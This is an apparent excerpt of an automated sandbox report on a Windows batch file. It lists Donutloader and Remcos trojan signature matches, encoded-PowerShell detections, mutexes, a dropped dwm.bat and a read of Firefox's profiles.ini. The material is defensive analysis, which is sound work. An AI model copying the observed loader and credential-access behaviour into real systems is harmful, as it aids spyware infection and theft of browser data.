                Source: 00000021.00000002.1999505719.00000000067FD000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000001A.00000002.1844562182.0000000005B26000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000040.00000002.3745750171.000000000873C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000026.00000002.2139303917.000000000613A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000036.00000002.3152004242.00000000094AC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000015.00000002.1741631380.000000000B6F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000015.00000002.1705682112.000000000601E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000004A.00000002.3877751859.000000000599B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000000B.00000002.1579785873.000000000A8F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000021.00000002.1996382580.000000000675D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000030.00000002.2524810033.00000000063CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000003B.00000002.2993784459.0000000006309000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000000B.00000002.1585464360.000000000AD59000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000004F.00000002.4085361601.0000000005EEC000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000003B.00000002.3497316854.000000000936C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000036.00000002.2777033949.00000000064A9000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000003B.00000002.2973427482.0000000006269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000001A.00000002.1842508364.0000000005A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000000B.00000002.1576231217.0000000009110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000B.00000002.1577369550.0000000009D58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 0000002B.00000002.2404458461.0000000008C7C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000026.00000002.2143751042.00000000061DA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000021.00000002.2066027425.000000000ABE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000036.00000002.3162188875.000000000AC11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000030.00000002.2547920074.0000000006484000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: 00000030.00000002.2770159710.000000000925C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000001A.00000002.1899196584.000000000A001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                Source: Process Memory Space: powershell.exe PID: 2232, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 2232, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3472, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3472, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 2800, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 2800, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 8144, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 8144, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7612, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 7612, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5808, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 5808, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6188, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 6188, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 2032, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: 11.2.powershell.exe.6e3a3b0.1.raw.unpack, jgmgx.csCryptographic APIs: 'TransformFinalBlock'
                Source: 11.2.powershell.exe.a859058.6.raw.unpack, jgmgx.csCryptographic APIs: 'TransformFinalBlock'
                Source: 11.2.powershell.exe.9090000.2.raw.unpack, jgmgx.csCryptographic APIs: 'TransformFinalBlock'
                Source: 21.2.powershell.exe.68bbca0.0.raw.unpack, jgmgx.csCryptographic APIs: 'TransformFinalBlock'
                Source: 48.2.powershell.exe.6a95d68.0.raw.unpack, jgmgx.csCryptographic APIs: 'TransformFinalBlock'
                Source: 11.2.powershell.exe.9090000.2.raw.unpack, jgmgx.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.powershell.exe.9090000.2.raw.unpack, jgmgx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.powershell.exe.a859058.6.raw.unpack, jgmgx.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.powershell.exe.a859058.6.raw.unpack, jgmgx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.powershell.exe.6e3a3b0.1.raw.unpack, jgmgx.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 11.2.powershell.exe.6e3a3b0.1.raw.unpack, jgmgx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 21.2.powershell.exe.68bbca0.0.raw.unpack, jgmgx.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 21.2.powershell.exe.68bbca0.0.raw.unpack, jgmgx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 48.2.powershell.exe.6a95d68.0.raw.unpack, jgmgx.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 48.2.powershell.exe.6a95d68.0.raw.unpack, jgmgx.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winBAT@118/94@4/3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,16_2_00410DE1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00410C68 FindResourceA,SizeofResource,LoadResource,LockResource,15_2_00410C68
                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\dwm.batJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6352:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3064:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5364:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1224:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5948:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5840:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4048:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3772:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1956:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7864:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1844:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5112:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6944:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3792:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4420:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltmls5d0.ysn.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\puDUCOeVK6.bat" "
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: HandleInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: powershell.exe, 0000000E.00000002.1526632717.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: powershell.exe, powershell.exe, 0000000F.00000002.1520370135.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
